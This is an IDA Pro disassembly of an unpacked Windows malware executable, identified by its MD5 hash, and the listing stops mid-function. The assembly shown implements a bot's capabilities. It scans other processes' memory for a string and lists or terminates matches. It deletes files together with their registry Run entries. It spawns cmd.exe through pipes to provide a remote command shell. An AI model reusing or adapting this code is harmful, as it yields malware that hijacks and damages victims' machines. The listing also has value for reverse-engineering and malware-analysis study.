;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : AA94CAF089BCB7C8EB0AAA15604717D1
; File Name : u:\work\aa94caf089bcb7c8eb0aaa15604717d1_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00016000 ( 90112.)
; Section size in file : 00016000 ( 90112.)
; Offset to raw data for section: 00001000
; Flags E00000A0: Text Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401146+31�p
; sub_401146+43�p ...
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 268h
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_40101A
; ---------------------------------------------------------------------------
loc_401013: ; CODE XREF: sub_401000+13C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40101A: ; CODE XREF: sub_401000+11�j
mov eax, [ebp+var_4]
cmp ds:off_418000[eax*4], 0
jz loc_401141
mov eax, [ebp+var_4]
push ds:off_418000[eax*4]
lea eax, [ebp+var_260]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_260]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_110]
push eax
push 3
push 0
lea eax, [ebp+var_260]
push eax
push [ebp+arg_0]
call ds:dword_417008 ; RegOpenKeyExA
and [ebp+var_220], 0
jmp short loc_401081
; ---------------------------------------------------------------------------
loc_401074: ; CODE XREF: sub_401000:loc_40112B�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_401081: ; CODE XREF: sub_401000+72�j
mov [ebp+var_21C], 104h
mov [ebp+var_224], 104h
lea eax, [ebp+var_224]
push eax
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_114]
push eax
push 0
lea eax, [ebp+var_21C]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_220]
push [ebp+var_110]
call ds:dword_417000 ; RegEnumValueA
mov [ebp+var_264], eax
cmp [ebp+var_264], 0
jz short loc_4010DD
jmp short loc_401130
; ---------------------------------------------------------------------------
loc_4010DD: ; CODE XREF: sub_401000+D9�j
cmp [ebp+var_114], 1
jnz short loc_40112B
push [ebp+arg_4]
push [ebp+var_224]
lea eax, [ebp+var_10C]
push eax
call sub_407ACA
add esp, 0Ch
mov [ebp+var_268], eax
cmp [ebp+var_268], 0
jz short loc_40112B
lea eax, [ebp+var_218]
push eax
push [ebp+var_110]
call ds:dword_417004 ; RegDeleteValueA
test eax, eax
jnz short loc_40112B
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40112B: ; CODE XREF: sub_401000+E4�j
; sub_401000+10B�j ...
jmp loc_401074
; ---------------------------------------------------------------------------
loc_401130: ; CODE XREF: sub_401000+DB�j
push [ebp+var_110]
call ds:dword_417028 ; RegCloseKey
jmp loc_401013
; ---------------------------------------------------------------------------
loc_401141: ; CODE XREF: sub_401000+25�j
mov eax, [ebp+var_8]
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401146 proc near ; CODE XREF: sub_401244+459�p
; sub_40A9CF+A72�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push 80h
push [ebp+arg_0]
call ds:dword_4170A8 ; SetFileAttributesA
test eax, eax
jnz short loc_401166
jmp locret_401242
; ---------------------------------------------------------------------------
loc_401166: ; CODE XREF: sub_401146+19�j
push [ebp+arg_0]
call ds:dword_4170AC ; DeleteFileA
push [ebp+arg_0]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov [ebp+var_4], eax
push [ebp+arg_0]
push 80000002h
call sub_401000
pop ecx
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jnz locret_401242
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_108]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_10C], eax
jmp short loc_4011DB
; ---------------------------------------------------------------------------
loc_4011CE: ; CODE XREF: sub_401146:loc_40121A�j
mov eax, [ebp+var_10C]
dec eax
mov [ebp+var_10C], eax
loc_4011DB: ; CODE XREF: sub_401146+86�j
cmp [ebp+var_10C], 0
jz short loc_40121C
mov eax, [ebp+arg_0]
add eax, [ebp+var_10C]
movsx eax, byte ptr [eax-1]
cmp eax, 5Ch
jnz short loc_40121A
push 104h
mov eax, [ebp+var_10C]
lea eax, [ebp+eax+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_40121C
; ---------------------------------------------------------------------------
loc_40121A: ; CODE XREF: sub_401146+AE�j
jmp short loc_4011CE
; ---------------------------------------------------------------------------
loc_40121C: ; CODE XREF: sub_401146+9C�j
; sub_401146+D2�j
lea eax, [ebp+var_108]
push eax
push 80000001h
call sub_401000
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
push 80000002h
call sub_401000
pop ecx
pop ecx
locret_401242: ; CODE XREF: sub_401146+1B�j
; sub_401146+56�j
leave
retn
sub_401146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401244 proc near ; DATA XREF: sub_4017AA+9D�o
var_3E8 = dword ptr -3E8h
var_3E4 = byte ptr -3E4h
var_3E0 = dword ptr -3E0h
var_3DC = dword ptr -3DCh
var_3D8 = dword ptr -3D8h
var_3D4 = dword ptr -3D4h
var_3D0 = dword ptr -3D0h
var_3CC = byte ptr -3CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = byte ptr -2A8h
var_2A7 = dword ptr -2A7h
var_2A3 = byte ptr -2A3h
var_1A3 = byte ptr -1A3h
var_B = byte ptr -0Bh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3E8h
push esi
push edi
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2AC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_40129D
lea eax, [ebp+var_2A3]
push eax
mov eax, [ebp+var_2AC]
push dword ptr [eax]
push offset dword_418144
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_40129D: ; CODE XREF: sub_401244+34�j
call sub_406041
mov [ebp+var_2B4], eax
cmp [ebp+var_2B4], 0
jnz short loc_4012C4
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4017A4
; ---------------------------------------------------------------------------
loc_4012C4: ; CODE XREF: sub_401244+6B�j
push 10000h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2B8], eax
and [ebp+var_2BC], 0
and [ebp+var_2B0], 0
jmp short loc_4012F2
; ---------------------------------------------------------------------------
loc_4012E5: ; CODE XREF: sub_401244+E2�j
; sub_401244+12B�j ...
mov eax, [ebp+var_2B0]
inc eax
mov [ebp+var_2B0], eax
loc_4012F2: ; CODE XREF: sub_401244+9F�j
mov eax, [ebp+var_2B4]
mov ecx, [ebp+var_2B0]
cmp ecx, [eax]
jge loc_401710
mov esi, [ebp+var_2B0]
imul esi, 114h
mov eax, [ebp+var_2B4]
mov edi, [eax+4]
call ds:dword_4170E8 ; GetCurrentProcessId
cmp [edi+esi], eax
jnz short loc_401328
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_401328: ; CODE XREF: sub_401244+E0�j
push 104h
lea eax, [ebp+var_3CC]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_3CC]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_401374
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401374: ; CODE XREF: sub_401244+129�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
movzx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
add eax, 11h
push eax
call ds:dword_417094 ; OpenProcess
mov [ebp+var_2C4], eax
cmp [ebp+var_2C4], 0
jnz short loc_4013B7
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_4013B7: ; CODE XREF: sub_401244+16C�j
and [ebp+var_2C0], 0
and [ebp+var_2C8], 0
loc_4013C5: ; CODE XREF: sub_401244:loc_4016FA�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
cmp eax, 10000h
jbe short loc_4013F7
mov [ebp+var_3E8], 10000h
jmp short loc_40141C
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: sub_401244+1A5�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
mov [ebp+var_3E8], eax
loc_40141C: ; CODE XREF: sub_401244+1B1�j
mov eax, [ebp+var_3E8]
mov [ebp+var_3D0], eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_3D0]
push [ebp+var_2B8]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+4]
add eax, [ebp+var_2C0]
push eax
push [ebp+var_2C4]
call ds:dword_417098 ; ReadProcessMemory
mov [ebp+var_3D4], eax
cmp [ebp+var_3D4], 0
jz loc_4016C5
cmp [ebp+var_2C8], 0
jz loc_4016C5
and [ebp+var_3D8], 0
and [ebp+var_3DC], 0
loc_401495: ; DATA XREF: UPX1:0041AD00�o
jmp short loc_4014A4
; ---------------------------------------------------------------------------
loc_401497: ; CODE XREF: sub_401244:loc_4015DB�j
mov eax, [ebp+var_3DC]
inc eax
mov [ebp+var_3DC], eax
loc_4014A4: ; CODE XREF: sub_401244:loc_401495�j
mov eax, [ebp+var_2C8]
sub eax, [ebp+var_2A7]
cmp [ebp+var_3DC], eax
ja loc_4015E0
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
add ecx, 20h
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
sub ecx, 20h
cmp eax, ecx
jnz loc_4015DB
loc_401514: ; CODE XREF: sub_401244+290�j
; sub_401244+2AD�j
mov [ebp+var_3E0], 1
jmp short loc_40152D
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: sub_401244:loc_4015D6�j
mov eax, [ebp+var_3E0]
inc eax
mov [ebp+var_3E0], eax
loc_40152D: ; CODE XREF: sub_401244+2DA�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
test eax, eax
jnz short loc_401556
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
mov [ebp+var_3D8], eax
jmp loc_40179F
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401244+2F9�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
sub ecx, 20h
cmp eax, ecx
jz short loc_4015D6
jmp short loc_4015DB
; ---------------------------------------------------------------------------
loc_4015D6: ; CODE XREF: sub_401244+338�j
; sub_401244+363�j ...
jmp loc_401520
; ---------------------------------------------------------------------------
loc_4015DB: ; CODE XREF: sub_401244+2CA�j
; sub_401244+390�j
jmp loc_401497
; ---------------------------------------------------------------------------
loc_4015E0: ; CODE XREF: sub_401244+272�j
; sub_401244:loc_40179F�j
cmp [ebp+var_3D8], 0
jz loc_4016C5
mov eax, [ebp+var_2BC]
inc eax
mov [ebp+var_2BC], eax
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401675
push 3E8h
call ds:dword_41709C ; Sleep
mov al, [ebp+var_B]
mov [ebp+var_3E4], al
and [ebp+var_B], 0
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_2A3]
push eax
push offset dword_41811C
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 14h
mov al, [ebp+var_3E4]
mov [ebp+var_B], al
jmp short loc_4016A3
; ---------------------------------------------------------------------------
loc_401675: ; CODE XREF: sub_401244+3BF�j
push 0
push [ebp+var_2C4]
call ds:dword_4170A0 ; TerminateProcess
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_401146
pop ecx
loc_4016A3: ; CODE XREF: sub_401244+42F�j
mov eax, [ebp+var_2AC]
cmp dword ptr [eax+4], 0
jz short loc_4016C0
push [ebp+var_2C4]
call ds:dword_4170A4 ; CloseHandle
jmp loc_40179A
; ---------------------------------------------------------------------------
loc_4016C0: ; CODE XREF: sub_401244+469�j
jmp loc_401795
; ---------------------------------------------------------------------------
loc_4016C5: ; CODE XREF: sub_401244+230�j
; sub_401244+23D�j ...
mov eax, [ebp+var_2C0]
add eax, [ebp+var_3D0]
mov [ebp+var_2C0], eax
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov edx, [ebp+var_2C0]
cmp edx, [ecx+eax+8]
jnz short loc_4016FA
jmp short loc_4016FF
; ---------------------------------------------------------------------------
loc_4016FA: ; CODE XREF: sub_401244+4B2�j
jmp loc_4013C5
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401244+4B4�j
; sub_401244:loc_401795�j
push [ebp+var_2C4]
call ds:dword_4170A4 ; CloseHandle
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401710: ; CODE XREF: sub_401244+BC�j
; sub_401244:loc_40179A�j
push [ebp+var_2B4]
call sub_40636E
pop ecx
push [ebp+var_2B8]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401785
push 3E8h
call ds:dword_41709C ; Sleep
cmp [ebp+var_2BC], 0
jnz short loc_401764
lea eax, [ebp+var_2A3]
push eax
push offset dword_4180F8
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_401785
; ---------------------------------------------------------------------------
loc_401764: ; CODE XREF: sub_401244+501�j
lea eax, [ebp+var_2A3]
push eax
push [ebp+var_2BC]
push offset dword_4180CC
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_401785: ; CODE XREF: sub_401244+4ED�j
; sub_401244+51E�j
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_4017A4
; ---------------------------------------------------------------------------
loc_401795: ; CODE XREF: sub_401244:loc_4016C0�j
jmp loc_4016FF
; ---------------------------------------------------------------------------
loc_40179A: ; CODE XREF: sub_401244+477�j
jmp loc_401710
; ---------------------------------------------------------------------------
loc_40179F: ; CODE XREF: sub_401244+30D�j
jmp loc_4015E0
; ---------------------------------------------------------------------------
loc_4017A4: ; CODE XREF: sub_401244+7B�j
; sub_401244+54F�j
pop edi
pop esi
leave
retn 4
sub_401244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017AA proc near ; CODE XREF: sub_40A9CF+AA1�p
; sub_40A9CF+AD2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_4017C2
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
test eax, eax
jnz short loc_4017C7
loc_4017C2: ; CODE XREF: sub_4017AA+9�j
jmp locret_401854
; ---------------------------------------------------------------------------
loc_4017C7: ; CODE XREF: sub_4017AA+16�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4017DD
jmp short locret_401854
; ---------------------------------------------------------------------------
loc_4017DD: ; CODE XREF: sub_4017AA+2F�j
mov eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax+4], cl
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+5], eax
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 9
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 109h
push eax
call sub_405F67
pop ecx
pop ecx
movzx eax, [ebp+arg_8]
test eax, eax
jz short loc_401830
mov [ebp+var_8], offset aListing ; "Listing"
jmp short loc_401837
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017AA+7B�j
mov [ebp+var_8], offset aKilling ; "Killing"
loc_401837: ; CODE XREF: sub_4017AA+84�j
push [ebp+arg_4]
push [ebp+var_8]
push offset dword_418174
push 0
push [ebp+var_4]
push offset sub_401244
call sub_4095A4
add esp, 18h
locret_401854: ; CODE XREF: sub_4017AA:loc_4017C2�j
; sub_4017AA+31�j
leave
retn
sub_4017AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401856 proc near ; CODE XREF: sub_401981+A8�p
; sub_401981+E1�p ...
push ebp
mov ebp, esp
cmp ds:dword_41DEF4, 0FFFFFFFFh
jz short loc_40186E
push ds:dword_41DEF4
call ds:dword_4170A4 ; CloseHandle
loc_40186E: ; CODE XREF: sub_401856+A�j
cmp ds:dword_41DEE8, 0FFFFFFFFh
jz short loc_401883
push ds:dword_41DEE8
call ds:dword_4170A4 ; CloseHandle
loc_401883: ; CODE XREF: sub_401856+1F�j
cmp ds:dword_41DEEC, 0FFFFFFFFh
jz short loc_401898
push ds:dword_41DEEC
call ds:dword_4170A4 ; CloseHandle
loc_401898: ; CODE XREF: sub_401856+34�j
cmp ds:dword_41DEF0, 0FFFFFFFFh
jz short loc_4018AD
push ds:dword_41DEF0
call ds:dword_4170A4 ; CloseHandle
loc_4018AD: ; CODE XREF: sub_401856+49�j
pop ebp
retn
sub_401856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018AF proc near ; CODE XREF: sub_401981+28A�p
; sub_401981+395�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 200h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jnz short loc_4018D4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401922
loc_4018D4: ; CODE XREF: sub_4018AF+15�j
; sub_4018AF:loc_401920�j
push 32h
call ds:dword_41709C ; Sleep
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jz short loc_4018FE
call sub_416B64 ; clock
sub eax, ds:dword_41DEFC
cmp eax, 1F4h
jb short loc_4018FE
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_4018FE: ; CODE XREF: sub_4018AF+39�j
; sub_4018AF+4B�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401920
call sub_416B64 ; clock
sub eax, ds:dword_41DEFC
cmp eax, 0FAh
jb short loc_401920
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_401920: ; CODE XREF: sub_4018AF+5B�j
; sub_4018AF+6D�j
jmp short loc_4018D4
; ---------------------------------------------------------------------------
loc_401922: ; CODE XREF: sub_4018AF+23�j
; sub_4018AF+4D�j ...
call sub_416B64 ; clock
mov ds:dword_41DEFC, eax
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_401942
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_401957
loc_401942: ; CODE XREF: sub_4018AF+86�j
push offset dword_4181A4
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
jmp short loc_40196E
; ---------------------------------------------------------------------------
loc_401957: ; CODE XREF: sub_4018AF+91�j
push 200h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_407A56
add esp, 0Ch
loc_40196E: ; CODE XREF: sub_4018AF+A6�j
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
leave
retn
sub_4018AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401981 proc near ; DATA XREF: sub_401D6E+88�o
var_730 = dword ptr -730h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_714 = dword ptr -714h
var_510 = byte ptr -510h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_334 = dword ptr -334h
var_330 = word ptr -330h
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = byte ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = byte ptr -30Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 730h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_714]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
sub eax, 1F4h
mov ds:dword_41DEFC, eax
push 0
lea eax, [ebp+var_30C]
push eax
push 104h
push 0
push offset aCmd_exe ; "cmd.exe"
push 0
call ds:dword_41706C ; SearchPathA
test eax, eax
jnz short loc_4019ED
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_4019ED: ; CODE XREF: sub_401981+57�j
mov [ebp+var_318], 0Ch
mov [ebp+var_310], 1
and [ebp+var_314], 0
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_368]
push eax
lea eax, [ebp+var_364]
push eax
call ds:dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A41
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A41: ; CODE XREF: sub_401981+A6�j
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_36C]
push eax
lea eax, [ebp+var_728]
push eax
call ds:dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A7A
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A7A: ; CODE XREF: sub_401981+DF�j
push 3
push 0
push 0
push offset dword_41DEF0
call ds:dword_417074 ; GetCurrentProcess
push eax
push [ebp+var_36C]
call ds:dword_417074 ; GetCurrentProcess
push eax
call ds:dword_4170F0 ; DuplicateHandle
test eax, eax
jnz short loc_401ABB
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401ABB: ; CODE XREF: sub_401981+120�j
push 10h
push 0
lea eax, [ebp+var_724]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 44h
push 0
lea eax, [ebp+var_360]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_360], 44h
mov [ebp+var_334], 101h
and [ebp+var_330], 0
mov eax, [ebp+var_728]
mov [ebp+var_328], eax
mov eax, [ebp+var_368]
mov [ebp+var_324], eax
mov eax, [ebp+var_368]
mov [ebp+var_320], eax
lea eax, [ebp+var_724]
push eax
lea eax, [ebp+var_360]
push eax
push 0
push 0
push 0
push 1
push 0
push 0
push offset byte_41DF00
lea eax, [ebp+var_30C]
push eax
call ds:dword_41707C ; CreateProcessA
test eax, eax
jnz short loc_401B69
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401B69: ; CODE XREF: sub_401981+1CE�j
push [ebp+var_728]
call ds:dword_4170A4 ; CloseHandle
mov eax, [ebp+var_364]
mov ds:dword_41DEF4, eax
mov eax, [ebp+var_36C]
mov ds:dword_41DEE8, eax
mov eax, [ebp+var_724]
mov ds:dword_41DEEC, eax
push [ebp+var_720]
call ds:dword_4170A4 ; CloseHandle
and [ebp+var_4], 0
and [ebp+var_208], 0
loc_401BAD: ; CODE XREF: sub_401981+2E9�j
; sub_401981+39C�j
mov eax, [ebp+var_714]
cmp dword ptr [eax+4], 0
jz short loc_401BBE
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401BBE: ; CODE XREF: sub_401981+236�j
and [ebp+var_208], 0
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 200h
lea eax, [ebp+var_204]
push eax
push ds:dword_41DEF4
call ds:dword_417080 ; PeekNamedPipe
test eax, eax
jnz short loc_401C17
push offset aCouldNotReadDa ; "Could not read data from process."
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C17: ; CODE XREF: sub_401981+27C�j
cmp [ebp+var_4], 0
jnz short loc_401C6F
mov [ebp+var_730], 103h
lea eax, [ebp+var_730]
push eax
push ds:dword_41DEEC
call ds:dword_417084 ; GetExitCodeProcess
test eax, eax
jz short loc_401C62
cmp [ebp+var_730], 103h
jz short loc_401C62
push offset aCmd_exeProcess ; "Cmd.exe process has terminated."
lea eax, [ebp+var_510]
push eax
call sub_40D53F
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C62: ; CODE XREF: sub_401981+2BB�j
; sub_401981+2C7�j
push 0Ah
call ds:dword_41709C ; Sleep
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401C6F: ; CODE XREF: sub_401981+29A�j
and [ebp+var_72C], 0
jmp short loc_401C85
; ---------------------------------------------------------------------------
loc_401C78: ; CODE XREF: sub_401981:loc_401CAF�j
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_72C], eax
loc_401C85: ; CODE XREF: sub_401981+2F5�j
mov eax, [ebp+var_72C]
cmp eax, [ebp+var_4]
jnb short loc_401CB1
mov eax, [ebp+var_72C]
movsx eax, [ebp+eax+var_204]
cmp eax, 0Ah
jnz short loc_401CAF
mov [ebp+var_208], 1
jmp short loc_401CB1
; ---------------------------------------------------------------------------
loc_401CAF: ; CODE XREF: sub_401981+320�j
jmp short loc_401C78
; ---------------------------------------------------------------------------
loc_401CB1: ; CODE XREF: sub_401981+30D�j
; sub_401981+32C�j
cmp [ebp+var_208], 0
jz short loc_401CC6
